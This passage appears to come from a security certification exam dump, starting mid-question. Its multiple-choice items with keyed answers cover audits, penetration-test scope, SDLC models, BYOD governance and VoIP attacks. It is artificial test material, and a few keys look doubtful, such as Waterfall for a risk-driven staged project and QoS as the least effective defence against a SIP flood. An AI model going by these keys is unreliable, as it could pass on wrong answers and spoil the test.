hardening initiative. A third party auditor reported findings against the business because some
systems were missing patches. Which of the following statements BEST describes this situation?
A. The CFO is at fault because they are responsible for patching the systems and have already
been given patch management and SOE hardening products.
B. The audit findings are invalid because remedial steps have already been applied to patch
servers and the remediation takes time to complete.
C. The CISO has not selected the correct controls and the audit findings should be assigned to
them instead of the CFO.
D. Security controls are generally never 100% effective and gaps should be explained to
stakeholders and managed accordingly.
D. Security controls are generally never 100% effective and gaps should be explained to
stakeholders and managed accordingly.
The Information Security Officer (ISO) is reviewing a summary of the findings from the last COOP
tabletop exercise. The Chief Information Officer (CIO) wants to determine which additional controls
must be implemented to reduce the risk of an extended customer service outage due to the VoIP
system being unavailable. Which of the following BEST describes the scenario presented and the
document the ISO is reviewing?
A. The ISO is evaluating the business implications of a recent telephone system failure within the
BIA.
B. The ISO is investigating the impact of a possible downtime of the messaging system within the
RA.
C. The ISO is calculating the budget adjustment needed to ensure audio/video system redundancy
within the RFQ.
D. The ISO is assessing the effect of a simulated downtime involving the telecommunication
system within the AAR.
D. The ISO is assessing the effect of a simulated downtime involving the telecommunication
system within the AAR.
Which of the following activities is commonly deemed “OUT OF SCOPE” when undertaking a
penetration test?
A. Test password complexity of all login fields and input validation of form fields
B. Reverse engineering any thick client software that has been provided for the test
C. Undertaking network-based denial of service attacks in production environment
D. Attempting to perform blind SQL injection and reflected cross-site scripting attacks
E. Running a vulnerability scanning tool to assess network and host weaknesses
C. Undertaking network-based denial of service attacks in production environment
A company is in the process of implementing a new front end user interface for its customers; the
goal is to provide them with more self service functionality. The application has been written by
developers over the last six months and the project is currently in the test phase.
Which of the following security activities should be implemented as part of the SDL in order to
provide the MOST security coverage over the solution? (Select TWO).
A. Perform unit testing of the binary code
B. Perform code review over a sampling of the front end source code
C. Perform black box penetration testing over the solution
D. Perform grey box penetration testing over the solution
E. Perform static code review over the front end source code
D. Perform grey box penetration testing over the solution
E. Perform static code review over the front end source code
A new web based application has been developed and deployed in production. A security
engineer decides to use an HTTP interceptor for testing the application. Which of the following
problems would MOST likely be uncovered by this tool?
A. The tool could show that input validation was only enabled on the client side
B. The tool could enumerate backend SQL database table and column names
C. The tool could force HTTP methods such as DELETE that the server has denied
D. The tool could fuzz the application to determine where memory leaks occur
A. The tool could show that input validation was only enabled on the client side
A security consultant is conducting a network assessment and wishes to discover any legacy
backup Internet connections the network may have. Where would the consultant find this
information and why would it be valuable?
A. This information can be found in global routing tables, and is valuable because backup
connections typically do not have perimeter protection as strong as the primary connection.
B. This information can be found by calling the regional Internet registry, and is valuable because
backup connections typically do not require VPN access to the network.
C. This information can be found by accessing telecom billing records, and is valuable because
backup connections typically have much lower latency than primary connections.
D. This information can be found by querying the network’s DNS servers, and is valuable because
backup DNS servers typically allow recursive queries from Internet hosts.
A. This information can be found in global routing tables, and is valuable because backup
connections typically do not have perimeter protection as strong as the primary connection.
A network administrator with a company’s NSP has received a CERT alert for targeted adversarial
behavior at the company. In addition to the company’s physical security, which of the following can
the network administrator use to detect the presence of a malicious actor physically accessing the
company’s network or information systems from within? (Select TWO).
A. RAS
B. Vulnerability scanner
C. HTTP intercept
D. HIDS
E. Port scanner
F. Protocol analyzer
D. HIDS
F. Protocol analyzer
The security engineer receives an incident ticket from the helpdesk stating that DNS lookup
requests are no longer working from the office. The network team has ensured that Layer 2 and
Layer 3 connectivity are working. Which of the following tools would a security engineer use to
make sure the DNS server is listening on port 53?
A. PING
B. NESSUS
C. NSLOOKUP
D. NMAP
D. NMAP
A human resources manager at a software development company has been tasked with recruiting
personnel for a new cyber defense division in the company. This division will require personnel to
have high technology skills and industry certifications. Which of the following is the BEST method
for this manager to gain insight into this industry to execute the task?
A. Interview candidates, attend training, and hire a staffing company that specializes in technology
jobs
B. Interview employees and managers to discover the industry hot topics and trends
C. Attend meetings with staff, internal training, and become certified in software management
D. Attend conferences, webinars, and training to remain current with the industry and job
requirements
D. Attend conferences, webinars, and training to remain current with the industry and job
requirements
The Chief Information Security Officer (CISO) is asking for ways to protect against zero-day
exploits. The CISO is concerned that an unrecognized threat could compromise corporate data
and result in regulatory fines as well as poor corporate publicity. The network is mostly flat, with
split staff/guest wireless functionality. Which of the following equipment MUST be deployed to
guard against unknown threats?
A. Cloud-based antivirus solution, running as local admin, with push technology for definition
updates.
B. Implementation of an offsite data center hosting all company data, as well as deployment of
VDI for all client computing needs.
C. Host based heuristic IPS, segregated on a management VLAN, with direct control of the
perimeter firewall ACLs.
D. Behavior based IPS with a communication link to a cloud based vulnerability and threat feed.
D. Behavior based IPS with a communication link to a cloud based vulnerability and threat feed.
A small company’s Chief Executive Officer (CEO) has asked its Chief Security Officer (CSO) to
improve the company’s security posture quickly with regard to targeted attacks. Which of the
following should the CSO conduct FIRST?
A. Survey threat feeds from services inside the same industry.
B. Purchase multiple threat feeds to ensure diversity and implement blocks for malicious traffic.
C. Conduct an internal audit against industry best practices to perform a qualitative analysis.
D. Deploy a UTM solution that receives frequent updates from a trusted industry vendor.
A. Survey threat feeds from services inside the same industry.
A security engineer is working on a large software development project. As part of the design of
the project, various stakeholder requirements were gathered and decomposed to an
implementable and testable level. Various security requirements were also documented. Organize
the following security requirements into the correct hierarchy required for an SRTM.
Requirement 1: The system shall provide confidentiality for data in transit and data at rest.
Requirement 2: The system shall use SSL, SSH, or SCP for all data transport.
Requirement 3: The system shall implement a file-level encryption scheme.
Requirement 4: The system shall provide integrity for all data at rest.
Requirement 5: The system shall perform CRC checks on all files.
A. Level 1: Requirements 1 and 4; Level 2: Requirements 2, 3, and 5
B. Level 1: Requirements 1 and 4; Level 2: Requirements 2 and 3 under 1, Requirement 5 under 4
C. Level 1: Requirements 1 and 4; Level 2: Requirement 2 under 1, Requirement 5 under 4; Level
3: Requirement 3 under 2
D. Level 1: Requirements 1, 2, and 3; Level 2: Requirements 4 and 5
B. Level 1: Requirements 1 and 4; Level 2: Requirements 2 and 3 under 1, Requirement 5 under 4
A mature organization with legacy information systems has incorporated numerous new processes
and dependencies to manage security as its networks and infrastructure are modernized. The
Chief Information Officer has become increasingly frustrated with frequent releases, stating that the
organization needs everything to work completely, and the vendor should already have those
desires built into the software product. The vendor has been in constant communication with
personnel and groups within the organization to understand its business process and capture new
software requirements from users. Which of the following methods of software development is this
organization’s configuration management process using?
A. Agile
B. SDL
C. Waterfall
D. Joint application development
A. Agile
A security engineer is a new member of a configuration board at the request of management. The
company has two new major IT projects starting this year and wants to plan security into the
application deployment. The board is primarily concerned with the applications’ compliance with
federal assessment and authorization standards. The security engineer asks for a timeline to
determine when a security assessment of both applications should occur and does not attend
subsequent configuration board meetings. If the security engineer is only going to perform a
security assessment, which of the following steps in system authorization has the security
engineer omitted?
A. Establish the security control baseline
B. Build the application according to software development security standards
C. Review the results of user acceptance testing
D. Consult with the stakeholders to determine which standards can be omitted
A. Establish the security control baseline
An analyst connects to a company web conference hosted on
www.webconference.com/meetingID#01234 and observes that numerous guests have been
allowed to join, without providing identifying information. The topics covered during the web
conference are considered proprietary to the company. Which of the following security concerns
does the analyst present to management?
A. Guest users could present a risk to the integrity of the company’s information
B. Authenticated users could sponsor guest access that was previously approved by management
C. Unauthenticated users could present a risk to the confidentiality of the company’s information
D. Meeting owners could sponsor guest access if they have passed a background check
C. Unauthenticated users could present a risk to the confidentiality of the company’s information
During a recent audit of servers, a company discovered that a network administrator, who required
remote access, had deployed an unauthorized remote access application that communicated over
common ports already allowed through the firewall. A network scan showed that this remote
access application had already been installed on one third of the servers in the company. Which of
the following is the MOST appropriate action that the company should take to provide a more
appropriate solution?
A. Implement an IPS to block the application on the network
B. Implement the remote application out to the rest of the servers
C. Implement SSL VPN with SAML standards for federation
D. Implement an ACL on the firewall with NAT for remote access
C. Implement SSL VPN with SAML standards for federation
A small retail company recently deployed a new point of sale (POS) system to all 67 stores. The
core of the POS is an extranet site, accessible only from retail stores and the corporate office over
a split-tunnel VPN. An additional split-tunnel VPN provides bi-directional connectivity back to the
main office, which provides voice connectivity for store VoIP phones. Each store offers guest
wireless functionality, as well as employee wireless. Only the staff wireless network has access to
the POS VPN. Recently, stores are reporting poor response times when accessing the POS
application from store computers as well as degraded voice quality when making phone calls.
Upon investigation, it is determined that three store PCs are hosting malware, which is generating
excessive network traffic. After malware removal, the information security department is asked to
review the configuration and suggest changes to prevent this from happening again. Which of the
following denotes the BEST way to mitigate future malware risk?
A. Deploy new perimeter firewalls at all stores with UTM functionality.
B. Change antivirus vendors at the store and the corporate office.
C. Move to a VDI solution that runs offsite from the same data center that hosts the new POS
solution.
D. Deploy a proxy server with content filtering at the corporate office and route all traffic through it.
A. Deploy new perimeter firewalls at all stores with UTM functionality.
Executive management is asking for a new manufacturing control and workflow automation
solution. This application will facilitate management of proprietary information and closely guarded
corporate trade secrets.
The information security team has been a part of the department meetings and come away with
the following notes:
-Human resources would like complete access to employee data stored in the application. They
would like automated data interchange with the employee management application, a cloud-based
SaaS application.
-Sales is asking for easy order tracking to facilitate feedback to customers.
-Legal is asking for adequate safeguards to protect trade secrets. They are also concerned with
data ownership questions and legal jurisdiction.
-Manufacturing is asking for ease of use. Employees working the assembly line cannot be
bothered with additional steps or overhead. System interaction needs to be quick and easy.
-Quality assurance is concerned about managing the end product and tracking overall
performance of the product being produced. They would like read-only access to the entire
workflow process for monitoring and baselining.
The favored solution is a user friendly software application that would be hosted onsite. It has
extensive ACL functionality, but also has readily available APIs for extensibility. It supports read-only
access, kiosk automation, custom fields, and data encryption.
Which of the following departments’ request is in contrast to the favored solution?
A. Manufacturing
B. Legal
C. Sales
D. Quality assurance
E. Human resources
E. Human resources
The helpdesk manager wants to find a solution that will enable the helpdesk staff to better serve
company employees who call with computer-related problems. The helpdesk staff is currently
unable to perform effective troubleshooting and relies on callers to describe their technology
problems. Given that the helpdesk staff is located within the company headquarters and 90% of
the callers are telecommuters, which of the following tools should the helpdesk manager use to
make the staff more effective at troubleshooting while at the same time reducing company costs?
(Select TWO).
A. Web cameras
B. Email
C. Instant messaging
D. BYOD
E. Desktop sharing
F. Presence
C. Instant messaging
E. Desktop sharing
An intruder was recently discovered inside the data center, a highly sensitive area. To gain
access, the intruder circumvented numerous layers of physical and electronic security measures.
Company leadership has asked for a thorough review of physical security controls to prevent this
from happening again. Which of the following departments are the MOST heavily invested in
rectifying the problem? (Select THREE).
A. Facilities management
B. Human resources
C. Research and development
D. Programming
E. Data center operations
F. Marketing
G. Information technology
A. Facilities management
E. Data center operations
G. Information technology
A completely new class of web-based vulnerabilities has been discovered. Claims have been
made that all common web-based development frameworks are susceptible to attack. Proof-of-concept
details have emerged on the Internet. A security advisor within a company has been
asked to provide recommendations on how to respond quickly to these vulnerabilities. Which of
the following BEST describes how the security advisor should respond?
A. Assess the reliability of the information source, likelihood of exploitability, and impact to hosted
data. Attempt to exploit via the proof-of-concept code. Consider remediation options.
B. Hire an independent security consulting agency to perform a penetration test of the web
servers. Advise management of any ‘high’ or ‘critical’ penetration test findings and put forward
recommendations for mitigation.
C. Review vulnerability write-ups posted on the Internet. Respond to management with a
recommendation to wait until the news has been independently verified by software vendors
providing the web application software.
D. Notify all customers about the threat to their hosted data. Bring the web servers down into
“maintenance mode” until the vulnerability can be reliably mitigated through a vendor patch.
A. Assess the reliability of the information source, likelihood of exploitability, and impact to hosted
data. Attempt to exploit via the proof-of-concept code. Consider remediation options.
A company sales manager received a memo from the company’s financial department which
stated that the company would not be putting its software products through the same security
testing as previous years to reduce the research and development cost by 20 percent for the
upcoming year. The memo also stated that the marketing material and service level agreement for
each product would remain unchanged. The sales manager has reviewed the sales goals for the
upcoming year and identified an increased target across the software products that will be affected
by the financial department’s change. All software products will continue to go through new
development in the coming year. Which of the following should the sales manager do to ensure
the company stays out of trouble?
A. Discuss the issue with the software product’s user groups
B. Consult the company’s legal department on practices and law
C. Contact senior finance management and provide background information
D. Seek industry outreach for software practices and law
B. Consult the company’s legal department on practices and law
A member of the software development team has requested advice from the security team to
implement a new secure lab for testing malware. Which of the following is the NEXT step that the
security team should take?
A. Purchase new hardware to keep the malware isolated.
B. Develop a policy to outline what will be required in the secure lab.
C. Construct a series of VMs to host the malware environment.
D. Create a proposal and present it to management for approval.
D. Create a proposal and present it to management for approval.
A company has issued a new mobile device policy permitting BYOD and company-issued devices.
The company-issued device has a managed middleware client that restricts the applications
allowed on company devices and provides those that are approved. The middleware client
provides configuration standardization for both company owned and BYOD to secure data and
communication to the device according to industry best practices. The policy states that, “BYOD
clients must meet the company’s infrastructure requirements to permit a connection.” The
company also issues a memorandum separate from the policy, which provides instructions for the
purchase, installation, and use of the middleware client on BYOD. Which of the following is being
described?
A. Asset management
B. IT governance
C. Change management
D. Transference of risk
B. IT governance
A security engineer on a large enterprise network needs to schedule maintenance within a fixed
window of time. A total outage period of four hours is permitted for servers. Workstations can
undergo maintenance from 8:00 pm to 6:00 am daily. Which of the following can specify
parameters for the maintenance work? (Select TWO).
A. Managed security service
B. Memorandum of understanding
C. Quality of service
D. Network service provider
E. Operating level agreement
B. Memorandum of understanding
E. Operating level agreement
An organization has decided to reduce labor costs by outsourcing back office processing of credit
applications to a provider located in another country. Data sovereignty and privacy concerns
raised by the security team resulted in the third-party provider only accessing and processing the
data via remote desktop sessions. To facilitate communications and improve productivity, staff at
the third party has been provided with corporate email accounts that are only accessible via the
remote desktop sessions. Email forwarding is blocked and staff at the third party can only
communicate with staff within the organization. Which of the following additional controls should
be implemented to prevent data loss? (Select THREE).
A. Implement hashing of data in transit
B. Session recording and capture
C. Disable cross session cut and paste
D. Monitor approved credit accounts
E. User access audit reviews
F. Source IP whitelisting
C. Disable cross session cut and paste
E. User access audit reviews
F. Source IP whitelisting
A company has received the contract to begin developing a new suite of software tools to replace
an aging collaboration solution. The original collaboration solution has been in place for nine
years, contains over a million lines of code, and took over two years to develop originally. The
SDLC has been broken up into eight primary stages, with each stage requiring an in-depth risk
analysis before moving on to the next phase. Which of the following software development
methods is MOST applicable?
A. Spiral model
B. Incremental model
C. Waterfall model
D. Agile model
C. Waterfall model
An attacker attempts to create a DoS event against the VoIP system of a company. The attacker
uses a tool to flood the network with a large number of SIP INVITE traffic. Which of the following
would be LEAST likely to thwart such an attack?
A. Install IDS/IPS systems on the network
B. Force all SIP communication to be encrypted
C. Create separate VLANs for voice and data traffic
D. Implement QoS parameters on the switches
D. Implement QoS parameters on the switches